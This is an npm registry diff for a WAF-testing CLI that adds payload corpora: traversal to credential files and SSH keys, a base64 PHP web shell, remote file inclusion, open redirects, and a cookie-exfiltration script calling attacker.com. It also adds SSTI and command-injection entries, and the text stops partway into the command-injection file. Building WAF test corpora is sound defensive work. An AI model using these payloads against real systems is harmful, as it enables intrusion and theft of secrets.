@waftester/cli 2.9.26 → 2.9.28
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +2 -2
- package/package.json +7 -7
- package/payloads/lfi-advanced.json +62 -0
- package/payloads/open-redirect.json +32 -0
- package/payloads/polyglot.json +32 -0
- package/payloads/rce-advanced.json +62 -0
- package/payloads/sqli-advanced.json +82 -0
- package/payloads/sqli-evasion.json +62 -0
- package/payloads/ssrf-advanced.json +52 -0
- package/payloads/ssti-advanced.json +42 -0
- package/payloads/waf-bypass-chains.json +62 -0
- package/payloads/xss-evasion.json +82 -0
- package/payloads/xxe-payloads.json +42 -0
package/README.md
CHANGED
|
@@ -40,7 +40,7 @@ Executes the complete lifecycle: endpoint discovery → WAF fingerprinting → o
|
|
|
40
40
|
|
|
41
41
|
### WAF Detection & Fingerprinting
|
|
42
42
|
|
|
43
|
-
Identify WAF vendors with
|
|
43
|
+
Identify WAF vendors with 198 vendor signatures:
|
|
44
44
|
|
|
45
45
|
```
|
|
46
46
|
$ waf-tester vendor -u https://protected.example.com
|
|
@@ -235,7 +235,7 @@ Also integrates with SonarQube, GitLab SAST, DefectDojo, Elasticsearch, Slack, T
|
|
|
235
235
|
|---------|-------------|
|
|
236
236
|
| `auto` | Full automated assessment (discovery → detection → testing → report) |
|
|
237
237
|
| `scan` | Targeted vulnerability scanning across 50+ categories |
|
|
238
|
-
| `vendor` | WAF vendor detection and fingerprinting (
|
|
238
|
+
| `vendor` | WAF vendor detection and fingerprinting (198 signatures) |
|
|
239
239
|
| `probe` | WAF detection + protocol info in one pass |
|
|
240
240
|
| `bypass` | Bypass discovery with tamper chain optimization |
|
|
241
241
|
| `assess` | Enterprise assessment with statistical metrics |
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@waftester/cli",
|
|
3
|
-
"version": "2.9.
|
|
3
|
+
"version": "2.9.28",
|
|
4
4
|
"description": "WAFtester — the most comprehensive WAF testing CLI & MCP server",
|
|
5
5
|
"license": "BUSL-1.1",
|
|
6
6
|
"repository": {
|
|
@@ -43,11 +43,11 @@
|
|
|
43
43
|
"node": ">=16"
|
|
44
44
|
},
|
|
45
45
|
"optionalDependencies": {
|
|
46
|
-
"@waftester/darwin-x64": "2.9.
|
|
47
|
-
"@waftester/darwin-arm64": "2.9.
|
|
48
|
-
"@waftester/linux-x64": "2.9.
|
|
49
|
-
"@waftester/linux-arm64": "2.9.
|
|
50
|
-
"@waftester/win32-x64": "2.9.
|
|
51
|
-
"@waftester/win32-arm64": "2.9.
|
|
46
|
+
"@waftester/darwin-x64": "2.9.28",
|
|
47
|
+
"@waftester/darwin-arm64": "2.9.28",
|
|
48
|
+
"@waftester/linux-x64": "2.9.28",
|
|
49
|
+
"@waftester/linux-arm64": "2.9.28",
|
|
50
|
+
"@waftester/win32-x64": "2.9.28",
|
|
51
|
+
"@waftester/win32-arm64": "2.9.28"
|
|
52
52
|
}
|
|
53
53
|
}
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"lfi-adv-001","payload":"....//....//....//etc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","double-dot"],"notes":"Double dot-slash bypass","expected_block":true},
|
|
3
|
+
{"id":"lfi-adv-002","payload":"..%252f..%252f..%252fetc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","double-encode"],"notes":"Double URL encoding","expected_block":true},
|
|
4
|
+
{"id":"lfi-adv-003","payload":"..%c0%af..%c0%af..%c0%afetc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","overlong-utf8"],"notes":"Overlong UTF-8 encoding","expected_block":true},
|
|
5
|
+
{"id":"lfi-adv-004","payload":"..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","fullwidth"],"notes":"Fullwidth solidus encoding","expected_block":true},
|
|
6
|
+
{"id":"lfi-adv-005","payload":"..%255c..%255c..%255cwindows\\system32\\drivers\\etc\\hosts","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","windows","double-encode"],"notes":"Windows double-encoded backslash","expected_block":true},
|
|
7
|
+
{"id":"lfi-adv-006","payload":"..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","windows","backslash"],"notes":"Windows backslash traversal","expected_block":true},
|
|
8
|
+
{"id":"lfi-adv-007","payload":"/etc/passwd%00","category":"lfi","method":"GET","severity_hint":"critical","tags":["null-byte","truncation"],"notes":"Null byte extension bypass (old PHP)","expected_block":true},
|
|
9
|
+
{"id":"lfi-adv-008","payload":"../../../../etc/passwd%00.jpg","category":"lfi","method":"GET","severity_hint":"critical","tags":["null-byte","extension-bypass"],"notes":"Null byte with fake extension","expected_block":true},
|
|
10
|
+
{"id":"lfi-adv-009","payload":"php://filter/convert.base64-encode/resource=index.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","wrapper","filter"],"notes":"PHP filter base64 source read","expected_block":true},
|
|
11
|
+
{"id":"lfi-adv-010","payload":"php://filter/read=convert.base64-encode/resource=config.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","wrapper","filter"],"notes":"PHP filter config read","expected_block":true},
|
|
12
|
+
{"id":"lfi-adv-011","payload":"php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","wrapper","iconv"],"notes":"PHP iconv filter source read","expected_block":true},
|
|
13
|
+
{"id":"lfi-adv-012","payload":"php://filter/zlib.deflate/convert.base64-encode/resource=index.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","wrapper","chain"],"notes":"PHP filter chain compression","expected_block":true},
|
|
14
|
+
{"id":"lfi-adv-013","payload":"php://input","category":"lfi","method":"POST","severity_hint":"critical","tags":["php","wrapper","rce"],"notes":"PHP input wrapper for RCE","expected_block":true},
|
|
15
|
+
{"id":"lfi-adv-014","payload":"data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","data-wrapper","rce"],"notes":"PHP data wrapper RCE","expected_block":true},
|
|
16
|
+
{"id":"lfi-adv-015","payload":"expect://id","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","expect","rce"],"notes":"PHP expect wrapper","expected_block":true},
|
|
17
|
+
{"id":"lfi-adv-016","payload":"phar://test.phar/test.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","phar","deserialization"],"notes":"PHP phar deserialization","expected_block":true},
|
|
18
|
+
{"id":"lfi-adv-017","payload":"/proc/self/environ","category":"lfi","method":"GET","severity_hint":"critical","tags":["proc","linux","info-disclosure"],"notes":"Linux process environment","expected_block":true},
|
|
19
|
+
{"id":"lfi-adv-018","payload":"/proc/self/fd/0","category":"lfi","method":"GET","severity_hint":"critical","tags":["proc","linux","fd"],"notes":"Linux file descriptor read","expected_block":true},
|
|
20
|
+
{"id":"lfi-adv-019","payload":"/proc/self/cmdline","category":"lfi","method":"GET","severity_hint":"high","tags":["proc","linux","info-disclosure"],"notes":"Linux command line args","expected_block":true},
|
|
21
|
+
{"id":"lfi-adv-020","payload":"/proc/self/cwd/index.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["proc","linux","source-read"],"notes":"Source read via /proc/self/cwd","expected_block":true},
|
|
22
|
+
{"id":"lfi-adv-021","payload":"/proc/self/maps","category":"lfi","method":"GET","severity_hint":"high","tags":["proc","linux","aslr-bypass"],"notes":"Memory mappings for ASLR bypass","expected_block":true},
|
|
23
|
+
{"id":"lfi-adv-022","payload":"/var/log/apache2/access.log","category":"lfi","method":"GET","severity_hint":"critical","tags":["log-poisoning","apache"],"notes":"Apache access log for poisoning","expected_block":true},
|
|
24
|
+
{"id":"lfi-adv-023","payload":"/var/log/apache2/error.log","category":"lfi","method":"GET","severity_hint":"critical","tags":["log-poisoning","apache"],"notes":"Apache error log for poisoning","expected_block":true},
|
|
25
|
+
{"id":"lfi-adv-024","payload":"/var/log/nginx/access.log","category":"lfi","method":"GET","severity_hint":"critical","tags":["log-poisoning","nginx"],"notes":"Nginx access log for poisoning","expected_block":true},
|
|
26
|
+
{"id":"lfi-adv-025","payload":"/var/log/mail.log","category":"lfi","method":"GET","severity_hint":"critical","tags":["log-poisoning","mail"],"notes":"Mail log for SMTP poisoning","expected_block":true},
|
|
27
|
+
{"id":"lfi-adv-026","payload":"/var/lib/php/sessions/sess_SESSIONID","category":"lfi","method":"GET","severity_hint":"critical","tags":["session","php"],"notes":"PHP session file inclusion","expected_block":true},
|
|
28
|
+
{"id":"lfi-adv-027","payload":"/tmp/sess_SESSIONID","category":"lfi","method":"GET","severity_hint":"critical","tags":["session","php","tmp"],"notes":"PHP session in tmp","expected_block":true},
|
|
29
|
+
{"id":"lfi-adv-028","payload":"zip://uploads/shell.jpg%23payload.php","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","zip-wrapper"],"notes":"Zip wrapper file inclusion","expected_block":true},
|
|
30
|
+
{"id":"lfi-adv-029","payload":"/etc/shadow","category":"lfi","method":"GET","severity_hint":"critical","tags":["linux","credentials"],"notes":"Shadow password file","expected_block":true},
|
|
31
|
+
{"id":"lfi-adv-030","payload":"/etc/hosts","category":"lfi","method":"GET","severity_hint":"medium","tags":["linux","network"],"notes":"Hosts file read","expected_block":true},
|
|
32
|
+
{"id":"lfi-adv-031","payload":"/etc/nginx/nginx.conf","category":"lfi","method":"GET","severity_hint":"high","tags":["nginx","config"],"notes":"Nginx configuration","expected_block":true},
|
|
33
|
+
{"id":"lfi-adv-032","payload":"/etc/apache2/apache2.conf","category":"lfi","method":"GET","severity_hint":"high","tags":["apache","config"],"notes":"Apache configuration","expected_block":true},
|
|
34
|
+
{"id":"lfi-adv-033","payload":"/etc/mysql/my.cnf","category":"lfi","method":"GET","severity_hint":"high","tags":["mysql","config","credentials"],"notes":"MySQL configuration","expected_block":true},
|
|
35
|
+
{"id":"lfi-adv-034","payload":"/root/.ssh/id_rsa","category":"lfi","method":"GET","severity_hint":"critical","tags":["ssh","credentials"],"notes":"Root SSH private key","expected_block":true},
|
|
36
|
+
{"id":"lfi-adv-035","payload":"/root/.ssh/authorized_keys","category":"lfi","method":"GET","severity_hint":"high","tags":["ssh","reconnaissance"],"notes":"Root authorized SSH keys","expected_block":true},
|
|
37
|
+
{"id":"lfi-adv-036","payload":"/root/.bash_history","category":"lfi","method":"GET","severity_hint":"high","tags":["linux","history","credentials"],"notes":"Bash history may contain secrets","expected_block":true},
|
|
38
|
+
{"id":"lfi-adv-037","payload":"/home/www-data/.bashrc","category":"lfi","method":"GET","severity_hint":"medium","tags":["linux","config"],"notes":"Web user bashrc","expected_block":true},
|
|
39
|
+
{"id":"lfi-adv-038","payload":"C:\\Windows\\win.ini","category":"lfi","method":"GET","severity_hint":"high","tags":["windows","config"],"notes":"Windows win.ini","expected_block":true},
|
|
40
|
+
{"id":"lfi-adv-039","payload":"C:\\boot.ini","category":"lfi","method":"GET","severity_hint":"high","tags":["windows","config"],"notes":"Windows boot.ini","expected_block":true},
|
|
41
|
+
{"id":"lfi-adv-040","payload":"C:\\inetpub\\wwwroot\\web.config","category":"lfi","method":"GET","severity_hint":"critical","tags":["windows","iis","config"],"notes":"IIS web.config","expected_block":true},
|
|
42
|
+
{"id":"lfi-adv-041","payload":"C:\\Windows\\System32\\config\\SAM","category":"lfi","method":"GET","severity_hint":"critical","tags":["windows","credentials"],"notes":"Windows SAM database","expected_block":true},
|
|
43
|
+
{"id":"lfi-adv-042","payload":"WEB-INF/web.xml","category":"lfi","method":"GET","severity_hint":"critical","tags":["java","config"],"notes":"Java WEB-INF config","expected_block":true},
|
|
44
|
+
{"id":"lfi-adv-043","payload":"WEB-INF/classes/application.properties","category":"lfi","method":"GET","severity_hint":"critical","tags":["java","spring","credentials"],"notes":"Spring Boot properties","expected_block":true},
|
|
45
|
+
{"id":"lfi-adv-044","payload":".env","category":"lfi","method":"GET","severity_hint":"critical","tags":["dotenv","credentials"],"notes":"Environment file","expected_block":true},
|
|
46
|
+
{"id":"lfi-adv-045","payload":"../.env","category":"lfi","method":"GET","severity_hint":"critical","tags":["dotenv","credentials","traversal"],"notes":"Parent directory .env","expected_block":true},
|
|
47
|
+
{"id":"lfi-adv-046","payload":"../.git/config","category":"lfi","method":"GET","severity_hint":"high","tags":["git","info-disclosure"],"notes":"Git config exposure","expected_block":true},
|
|
48
|
+
{"id":"lfi-adv-047","payload":"../.git/HEAD","category":"lfi","method":"GET","severity_hint":"high","tags":["git","info-disclosure"],"notes":"Git HEAD reference","expected_block":true},
|
|
49
|
+
{"id":"lfi-adv-048","payload":"../../.aws/credentials","category":"lfi","method":"GET","severity_hint":"critical","tags":["aws","credentials","cloud"],"notes":"AWS credentials file","expected_block":true},
|
|
50
|
+
{"id":"lfi-adv-049","payload":"../../.docker/config.json","category":"lfi","method":"GET","severity_hint":"critical","tags":["docker","credentials"],"notes":"Docker config with auth","expected_block":true},
|
|
51
|
+
{"id":"lfi-adv-050","payload":"/var/run/secrets/kubernetes.io/serviceaccount/token","category":"lfi","method":"GET","severity_hint":"critical","tags":["kubernetes","token","cloud"],"notes":"K8s service account token","expected_block":true},
|
|
52
|
+
{"id":"lfi-adv-051","payload":"....\\\\....\\\\....\\\\windows\\system32\\drivers\\etc\\hosts","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","windows","double-backslash"],"notes":"Double backslash bypass","expected_block":true},
|
|
53
|
+
{"id":"lfi-adv-052","payload":"..%5c..%5c..%5cetc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","encoded-backslash"],"notes":"URL encoded backslash traversal","expected_block":true},
|
|
54
|
+
{"id":"lfi-adv-053","payload":"/%2e%2e/%2e%2e/%2e%2e/etc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","dot-encode"],"notes":"URL encoded dots","expected_block":true},
|
|
55
|
+
{"id":"lfi-adv-054","payload":"/..%c1%9c..%c1%9c..%c1%9cetc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["traversal","overlong-utf8"],"notes":"IIS overlong UTF-8 backslash","expected_block":true},
|
|
56
|
+
{"id":"lfi-adv-055","payload":"file:///etc/passwd","category":"lfi","method":"GET","severity_hint":"critical","tags":["file-uri","protocol"],"notes":"file:// URI scheme","expected_block":true},
|
|
57
|
+
{"id":"lfi-adv-056","payload":"http://attacker.com/shell.txt","category":"rfi","method":"GET","severity_hint":"critical","tags":["rfi","remote-include"],"notes":"Remote file inclusion","expected_block":true},
|
|
58
|
+
{"id":"lfi-adv-057","payload":"https://attacker.com/shell.txt%00","category":"rfi","method":"GET","severity_hint":"critical","tags":["rfi","null-byte"],"notes":"RFI with null byte extension bypass","expected_block":true},
|
|
59
|
+
{"id":"lfi-adv-058","payload":"ftp://attacker.com/shell.txt","category":"rfi","method":"GET","severity_hint":"critical","tags":["rfi","ftp"],"notes":"FTP based RFI","expected_block":true},
|
|
60
|
+
{"id":"lfi-adv-059","payload":"\\\\attacker.com\\share\\shell.php","category":"rfi","method":"GET","severity_hint":"critical","tags":["rfi","smb","unc"],"notes":"UNC path RFI (Windows)","expected_block":true},
|
|
61
|
+
{"id":"lfi-adv-060","payload":"php://filter/convert.base64-encode|convert.base64-decode/resource=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+","category":"lfi","method":"GET","severity_hint":"critical","tags":["php","filter-chain","rce"],"notes":"PHP filter chain RCE (CVE-2024)","expected_block":true}
|
|
62
|
+
]
|
|
@@ -0,0 +1,32 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"redirect-001","payload":"//attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["protocol-relative"],"notes":"Protocol-relative redirect","expected_block":true},
|
|
3
|
+
{"id":"redirect-002","payload":"///attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["triple-slash"],"notes":"Triple-slash redirect","expected_block":true},
|
|
4
|
+
{"id":"redirect-003","payload":"////attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["multi-slash"],"notes":"Quadruple-slash redirect","expected_block":true},
|
|
5
|
+
{"id":"redirect-004","payload":"https://attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["absolute-url"],"notes":"Absolute URL redirect","expected_block":true},
|
|
6
|
+
{"id":"redirect-005","payload":"http://attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["absolute-url","http"],"notes":"HTTP absolute URL redirect","expected_block":true},
|
|
7
|
+
{"id":"redirect-006","payload":"https:attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["scheme-colon"],"notes":"Missing slashes after scheme","expected_block":true},
|
|
8
|
+
{"id":"redirect-007","payload":"http:attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["scheme-colon"],"notes":"HTTP missing slashes","expected_block":true},
|
|
9
|
+
{"id":"redirect-008","payload":"\\\\attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["backslash"],"notes":"Backslash redirect","expected_block":true},
|
|
10
|
+
{"id":"redirect-009","payload":"\\/attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["mixed-slash"],"notes":"Mixed slash redirect","expected_block":true},
|
|
11
|
+
{"id":"redirect-010","payload":"/\\attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["mixed-slash"],"notes":"Reverse mixed slash redirect","expected_block":true},
|
|
12
|
+
{"id":"redirect-011","payload":"/%09/attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["tab","whitespace"],"notes":"Tab character bypass","expected_block":true},
|
|
13
|
+
{"id":"redirect-012","payload":"/%0d/attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["cr","whitespace"],"notes":"Carriage return bypass","expected_block":true},
|
|
14
|
+
{"id":"redirect-013","payload":"/%0a/attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["lf","whitespace"],"notes":"Line feed bypass","expected_block":true},
|
|
15
|
+
{"id":"redirect-014","payload":"/%2f%2fattacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["url-encode"],"notes":"URL encoded slashes","expected_block":true},
|
|
16
|
+
{"id":"redirect-015","payload":"/%252f%252fattacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["double-encode"],"notes":"Double URL encoded slashes","expected_block":true},
|
|
17
|
+
{"id":"redirect-016","payload":"/%5cattacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["encoded-backslash"],"notes":"URL encoded backslash","expected_block":true},
|
|
18
|
+
{"id":"redirect-017","payload":"//attacker.com/..;/","category":"open-redirect","method":"GET","severity_hint":"high","tags":["path-normalization"],"notes":"Semicolon path normalization","expected_block":true},
|
|
19
|
+
{"id":"redirect-018","payload":"//attacker%E3%80%82com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["unicode","ideographic-dot"],"notes":"Unicode ideographic dot","expected_block":true},
|
|
20
|
+
{"id":"redirect-019","payload":"//attacker%00.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["null-byte"],"notes":"Null byte in domain","expected_block":true},
|
|
21
|
+
{"id":"redirect-020","payload":"javascript:alert(document.domain)//","category":"open-redirect","method":"GET","severity_hint":"critical","tags":["javascript-uri"],"notes":"JavaScript URI redirect","expected_block":true},
|
|
22
|
+
{"id":"redirect-021","payload":"data:text/html,<script>alert(1)</script>","category":"open-redirect","method":"GET","severity_hint":"critical","tags":["data-uri"],"notes":"Data URI redirect","expected_block":true},
|
|
23
|
+
{"id":"redirect-022","payload":"//attacker.com@legitimate.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["authority-confusion"],"notes":"Authority confusion","expected_block":true},
|
|
24
|
+
{"id":"redirect-023","payload":"//legitimate.com@attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["authority-confusion"],"notes":"Reverse authority confusion","expected_block":true},
|
|
25
|
+
{"id":"redirect-024","payload":"//legitimate.com%40attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["encoded-at"],"notes":"Encoded @ sign bypass","expected_block":true},
|
|
26
|
+
{"id":"redirect-025","payload":"https://attacker.com#legitimate.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["fragment"],"notes":"Fragment-based bypass","expected_block":true},
|
|
27
|
+
{"id":"redirect-026","payload":"https://attacker.com?legitimate.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["query"],"notes":"Query-based bypass","expected_block":true},
|
|
28
|
+
{"id":"redirect-027","payload":"//attacker.com%23@legitimate.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["encoded-hash"],"notes":"Encoded hash bypass","expected_block":true},
|
|
29
|
+
{"id":"redirect-028","payload":"https://legitimate.com.attacker.com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["subdomain"],"notes":"Subdomain impersonation","expected_block":true},
|
|
30
|
+
{"id":"redirect-029","payload":"//attacker。com","category":"open-redirect","method":"GET","severity_hint":"high","tags":["unicode","fullwidth-dot"],"notes":"Unicode fullwidth period","expected_block":true},
|
|
31
|
+
{"id":"redirect-030","payload":"https://attacker.com/legitimate.com/../","category":"open-redirect","method":"GET","severity_hint":"high","tags":["path-traversal"],"notes":"Path traversal bypass","expected_block":true}
|
|
32
|
+
]
|
|
@@ -0,0 +1,32 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"poly-001","payload":"jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%%0telerik11telerik22telerik33","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","multi-context"],"notes":"XSS polyglot - works in multiple HTML contexts","expected_block":true},
|
|
3
|
+
{"id":"poly-002","payload":"'\"><img src=x onerror=alert(1)//>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","html-break"],"notes":"Quote break + img onerror","expected_block":true},
|
|
4
|
+
{"id":"poly-003","payload":"'\"><svg/onload=alert(1)//","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","svg","html-break"],"notes":"Quote break + SVG onload","expected_block":true},
|
|
5
|
+
{"id":"poly-004","payload":"javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","mega-polyglot"],"notes":"Multi-tag-break mega polyglot","expected_block":true},
|
|
6
|
+
{"id":"poly-005","payload":"-->'\"--><svg/onload=alert(1)>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","comment-break"],"notes":"Comment + attribute break","expected_block":true},
|
|
7
|
+
{"id":"poly-006","payload":"' OR 1=1--\"><svg/onload=alert(1)>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","sqli","dual"],"notes":"SQLi + XSS dual payload","expected_block":true},
|
|
8
|
+
{"id":"poly-007","payload":"{{7*7}}<%= 7*7 %>${{7*7}}${7*7}","category":"polyglot","method":"GET","severity_hint":"critical","tags":["ssti","multi-engine"],"notes":"SSTI multi-engine probe","expected_block":true},
|
|
9
|
+
{"id":"poly-008","payload":"{{constructor.constructor('return this')().process.mainModule.require('child_process').execSync('id')}}","category":"polyglot","method":"GET","severity_hint":"critical","tags":["ssti","node","rce"],"notes":"Universal Node.js SSTI RCE","expected_block":true},
|
|
10
|
+
{"id":"poly-009","payload":"' OR 1=1-- -\"><script>alert(1)</script>{{7*7}}","category":"polyglot","method":"GET","severity_hint":"critical","tags":["sqli","xss","ssti","triple"],"notes":"SQLi + XSS + SSTI triple payload","expected_block":true},
|
|
11
|
+
{"id":"poly-010","payload":"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","all-quote-styles"],"notes":"XSS all quote style polyglot","expected_block":true},
|
|
12
|
+
{"id":"poly-011","payload":"<svg/onload=alert(1)>{{7*7}}'OR 1=1--","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","ssti","sqli"],"notes":"XSS + SSTI + SQLi combined","expected_block":true},
|
|
13
|
+
{"id":"poly-012","payload":"${7*7}{{7*7}}<%= 7*7 %>#{7*7}","category":"polyglot","method":"GET","severity_hint":"critical","tags":["ssti","all-engines"],"notes":"All template engine syntax probe","expected_block":true},
|
|
14
|
+
{"id":"poly-013","payload":"<x]||id;[><svg/onload=alert(1)>{{7*7}}","category":"polyglot","method":"GET","severity_hint":"critical","tags":["rce","xss","ssti"],"notes":"RCE + XSS + SSTI polyglot","expected_block":true},
|
|
15
|
+
{"id":"poly-014","payload":"';sleep(5)#\"><svg/onload=alert(1)>{{7*7}}","category":"polyglot","method":"GET","severity_hint":"critical","tags":["sqli","xss","ssti","time-based"],"notes":"SQLi sleep + XSS + SSTI","expected_block":true},
|
|
16
|
+
{"id":"poly-015","payload":"<!--<img src=\"--><img src=x onerror=alert(1)//>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","comment-injection"],"notes":"HTML comment injection polyglot","expected_block":true},
|
|
17
|
+
{"id":"poly-016","payload":"\"><img src=x onerror=alert(1)><\"","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","double-break"],"notes":"Double attribute break","expected_block":true},
|
|
18
|
+
{"id":"poly-017","payload":"%00'\"><script>alert(1)</script>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","null-byte"],"notes":"Null byte + quote break + script","expected_block":true},
|
|
19
|
+
{"id":"poly-018","payload":"' AND 1=0 UNION SELECT '<script>alert(1)</script>',2--","category":"polyglot","method":"GET","severity_hint":"critical","tags":["sqli","xss","stored"],"notes":"SQLi to stored XSS","expected_block":true},
|
|
20
|
+
{"id":"poly-019","payload":"{{''.__class__.__mro__[1].__subclasses__()}}<img src=x onerror=alert(1)>' OR 1=1--","category":"polyglot","method":"GET","severity_hint":"critical","tags":["ssti","xss","sqli","python"],"notes":"Python SSTI + XSS + SQLi","expected_block":true},
|
|
21
|
+
{"id":"poly-020","payload":"<script>document.location='http://attacker.com/cookie?c='+document.cookie</script>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","cookie-theft","exfil"],"notes":"Cookie exfiltration script","expected_block":true},
|
|
22
|
+
{"id":"poly-021","payload":"<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(1)\"/>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","svg","xmlns"],"notes":"SVG with explicit namespace","expected_block":true},
|
|
23
|
+
{"id":"poly-022","payload":"../../../../../etc/passwd%00' OR 1=1--","category":"polyglot","method":"GET","severity_hint":"critical","tags":["lfi","sqli","dual"],"notes":"LFI + SQLi dual payload","expected_block":true},
|
|
24
|
+
{"id":"poly-023","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><svg onload=alert(1)>&xxe;</svg>","category":"polyglot","method":"POST","severity_hint":"critical","tags":["xxe","xss","svg"],"notes":"XXE + XSS in SVG","expected_block":true},
|
|
25
|
+
{"id":"poly-024","payload":"http://127.0.0.1' OR 1=1--","category":"polyglot","method":"GET","severity_hint":"critical","tags":["ssrf","sqli","dual"],"notes":"SSRF + SQLi dual payload","expected_block":true},
|
|
26
|
+
{"id":"poly-025","payload":";id|<svg/onload=alert(1)>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["rce","xss","dual"],"notes":"Command injection + XSS","expected_block":true},
|
|
27
|
+
{"id":"poly-026","payload":"{{7*7}}\r\nLocation: http://attacker.com","category":"polyglot","method":"GET","severity_hint":"critical","tags":["ssti","crlf","redirect"],"notes":"SSTI + CRLF redirect","expected_block":true},
|
|
28
|
+
{"id":"poly-027","payload":"<math><mtext></mtext><mglyph><svg><mtext><style><path id=\"--><img src=x onerror=alert(1)//>\"\\/>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","mutation","mathml"],"notes":"MathML mutation XSS polyglot","expected_block":true},
|
|
29
|
+
{"id":"poly-028","payload":"<form><math><mtext></mtext><form><mglyph><svg><mtext><textarea><path id=\"</textarea><img src=x onerror=alert(1)//>\"\\/>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","mutation","sanitizer-bypass"],"notes":"Sanitizer bypass mutation polyglot","expected_block":true},
|
|
30
|
+
{"id":"poly-029","payload":"<noscript><p title=\"</noscript><img src=x onerror=alert(1)>\">","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","noscript","context-switch"],"notes":"Noscript context switch","expected_block":true},
|
|
31
|
+
{"id":"poly-030","payload":"</script></style>'\"--><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>","category":"polyglot","method":"GET","severity_hint":"critical","tags":["xss","universal","multi-context"],"notes":"Universal multi-context XSS polyglot","expected_block":true}
|
|
32
|
+
]
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"rce-adv-001","payload":";id","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","semicolon"],"notes":"Semicolon command separator","expected_block":true},
|
|
3
|
+
{"id":"rce-adv-002","payload":"|id","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","pipe"],"notes":"Pipe command injection","expected_block":true},
|
|
4
|
+
{"id":"rce-adv-003","payload":"||id","category":"rce","method":"GET","severity_hint":"critical","tags":["linux","or-chain"],"notes":"OR operator injection","expected_block":true},
|
|
5
|
+
